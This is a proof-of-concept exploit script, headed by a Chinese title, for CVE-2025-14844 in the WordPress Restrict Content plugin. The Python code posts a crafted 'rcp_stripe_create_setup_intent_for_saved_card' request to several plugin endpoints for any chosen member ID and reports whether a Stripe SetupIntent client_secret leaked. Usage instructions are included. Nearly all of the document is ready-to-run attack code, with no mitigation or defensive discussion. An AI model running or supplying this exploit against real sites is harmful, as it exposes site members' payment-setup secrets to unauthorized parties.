CVE-2025-14844 WordPress Restrict Content插件未授权信息泄露漏洞

import requests import json # CVE-2025-14844 PoC - Unauthenticated Stripe SetupIntent Secret Leak # Target: WordPress site with Restrict Content plugin <= 3.2.16 def exploit_cve_2025_14844(target_url, member_id): """ Exploit for Missing Authentication in rcp_stripe_create_setup_intent_for_saved_card This PoC demonstrates how an unauthenticated attacker can leak Stripe SetupIntent client_secret """ # The vulnerable endpoint is typically the WordPress REST API or admin-ajax.php endpoints = [ f"{target_url}/wp-json/restrict-content/v1/stripe/setup-intent", f"{target_url}/wp-admin/admin-ajax.php", f"{target_url}/wp-admin/admin-post.php" ] # Construct the exploit payload # The vulnerable function expects member_id and potentially user-controlled key payload = { 'action': 'rcp_stripe_create_setup_intent_for_saved_card', 'member_id': member_id, # Target any membership user ID # Additional parameters may be needed based on plugin version } print(f"[*] Targeting: {target_url}") print(f"[*] Targeting member ID: {member_id}") for endpoint in endpoints: try: print(f"\n[*] Trying endpoint: {endpoint}") if 'admin-ajax.php' in endpoint: response = requests.post(endpoint, data=payload, timeout=10) else: response = requests.post(endpoint, json=payload, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text[:500]}") # Check if we got a SetupIntent client_secret in response if 'client_secret' in response.text.lower() or 'seti_' in response.text: print("[+] VULNERABLE! Stripe SetupIntent client_secret may have been leaked") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False # Example usage if __name__ == "__main__": import sys if len(sys.argv) > 2: target = sys.argv[1] member = sys.argv[2] exploit_cve_2025_14844(target, member) else: print("Usage: python cve-2025-14844.py <target_url> <member_id>") print("Example: python cve-2025-14844.py https://example.com 1")